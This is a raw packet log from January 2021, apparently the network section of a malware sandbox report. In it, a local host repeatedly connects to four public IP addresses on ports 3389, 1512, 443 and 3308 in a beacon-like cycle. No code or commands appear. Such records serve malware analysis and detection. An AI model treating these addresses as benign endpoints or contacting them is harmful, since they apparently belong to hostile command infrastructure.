Jan 12, 2021 07:41:29.612806082 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.612844944 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.613043070 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.613122940 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.616364956 CET	49344	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:29.670588970 CET	3389	49344	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:29.725727081 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.778817892 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.778924942 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.779917955 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.832997084 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.839726925 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.839756966 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.839849949 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.852906942 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.907124043 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.907351971 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.913496971 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.913790941 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:29.966789007 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:29.967025995 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:30.005609035 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:30.020190001 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:30.118916988 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:30.118984938 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:30.119142056 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:30.122642994 CET	49345	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:30.175836086 CET	1512	49345	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:30.237976074 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.290355921 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.290440083 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.291420937 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.343533993 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.358275890 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.358392954 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.371362925 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.426126003 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.426635981 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.432549953 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.432869911 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.485011101 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.485227108 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.522905111 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.537796021 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.657898903 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.657938004 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.658082962 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.661281109 CET	49346	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:30.713565111 CET	443	49346	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:30.768834114 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.812089920 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.812319994 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.813222885 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.856162071 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.871503115 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.871535063 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.871776104 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.885796070 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.930843115 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.931097031 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.937228918 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.937510014 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:30.980654955 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:30.980892897 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:31.020184994 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.023968935 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.023989916 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.138190031 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.138216972 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.138402939 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:31.141520977 CET	49347	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:31.184710979 CET	3308	49347	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:31.250700951 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.304367065 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.304550886 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.305578947 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.359019995 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.379307032 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.379432917 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.379435062 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.379489899 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.388633013 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.452111006 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.452353001 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.456777096 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.456914902 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.511784077 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.511883020 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.551295996 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.565643072 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.565671921 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.656877995 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.656904936 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.657073975 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.657125950 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.660444975 CET	49348	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:31.714210987 CET	3389	49348	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:31.766308069 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.819140911 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:31.819335938 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.820609093 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.873569965 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:31.880283117 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:31.880309105 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:31.880382061 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.893341064 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.947524071 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:31.947781086 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.953233957 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:31.953547955 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:32.006333113 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.006575108 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:32.044955015 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.059350967 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.059376955 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.157681942 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.157708883 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.157918930 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:32.160923958 CET	49349	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:32.213699102 CET	1512	49349	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:32.265892029 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.317665100 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.317771912 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.318777084 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.370313883 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.385092020 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.385217905 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.395240068 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.449176073 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.449342012 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.454850912 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.455030918 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.506834984 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.507203102 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.542787075 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.558722973 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.558737040 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.677922010 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.677942991 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.677990913 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.681022882 CET	49350	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:32.732593060 CET	443	49350	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:32.796406031 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.839518070 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:32.839654922 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.841348886 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.884428024 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:32.895054102 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:32.895075083 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:32.895207882 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.911465883 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.957155943 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:32.957362890 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.968564034 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:32.968905926 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:33.011898041 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.012094975 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:33.052313089 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.055327892 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.055666924 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.169220924 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.169253111 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.169368982 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:33.172081947 CET	49351	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:33.215188026 CET	3308	49351	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:33.280659914 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.334551096 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.334726095 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.335987091 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.389544010 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.403842926 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.403912067 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.404015064 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.404102087 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.413719893 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.471601009 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.471842051 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.477914095 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.478106022 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.531678915 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.531953096 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.571475029 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.585623026 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.585648060 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.674987078 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.675030947 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.675287962 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.675374985 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.681880951 CET	49352	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:33.735553026 CET	3389	49352	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:33.802184105 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.855323076 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:33.855473042 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.857157946 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.910294056 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:33.917146921 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:33.917181969 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:33.917373896 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.932416916 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.986608028 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:33.986953974 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.997143030 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:33.997246981 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:34.050460100 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.050801039 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:34.089253902 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.103893042 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.205018997 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.205065966 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.205399036 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:34.211183071 CET	49353	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:34.264457941 CET	1512	49353	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:34.328869104 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.381546974 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:34.381725073 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.383387089 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.435587883 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:34.450143099 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:34.450372934 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.463104963 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.517807007 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:34.518153906 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.528645992 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.528939009 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.581310987 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:34.581620932 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:34.634139061 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:35.107132912 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:35.107431889 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:35.113051891 CET	49354	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:35.165185928 CET	443	49354	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:35.234160900 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.277615070 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.277832031 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.279280901 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.322308064 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.332941055 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.332967997 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.333086967 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.347290993 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.393163919 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.393354893 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.404508114 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.405005932 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.448013067 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.448369026 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.487322092 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.491532087 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.605331898 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.605412006 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.605695009 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.611346960 CET	49355	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:35.654552937 CET	3308	49355	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:35.733365059 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.787229061 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.787400961 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.788343906 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.842103004 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.858166933 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.858189106 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.858278036 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.861462116 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.870573997 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.929877043 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.930154085 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.940180063 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.940274000 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:35.994143963 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:35.994505882 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:36.033644915 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.048223972 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.048252106 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.138968945 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.138993979 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.139378071 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:36.145169020 CET	49356	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:36.199348927 CET	3389	49356	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:36.274913073 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.327852011 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.328107119 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.329317093 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.382034063 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.389071941 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.389117956 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.389290094 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.402196884 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.456248999 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.456470966 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.461040020 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.461213112 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.514379025 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.514693975 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.552993059 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.567421913 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.668670893 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.668718100 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.668931961 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.672204971 CET	49357	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:36.724999905 CET	1512	49357	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:36.773732901 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.825901985 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:36.826113939 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.827356100 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.879565954 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:36.894236088 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:36.894392967 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.915292978 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.969906092 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:36.970168114 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.980324030 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:36.980577946 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:37.032497883 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.032809973 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:37.070986032 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.085038900 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.204274893 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.204317093 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.204355955 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:37.204392910 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:37.206994057 CET	49358	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:37.259054899 CET	443	49358	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:37.325114965 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.368226051 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.368417978 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.369894981 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.412946939 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.427318096 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.427351952 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.427433014 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.442331076 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.487354994 CET	3308	49359	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:37.487643003 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.498343945 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.498706102 CET	49359	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:37.541810989 CET	3308	49359	80.86.91.27	192.168.2.22
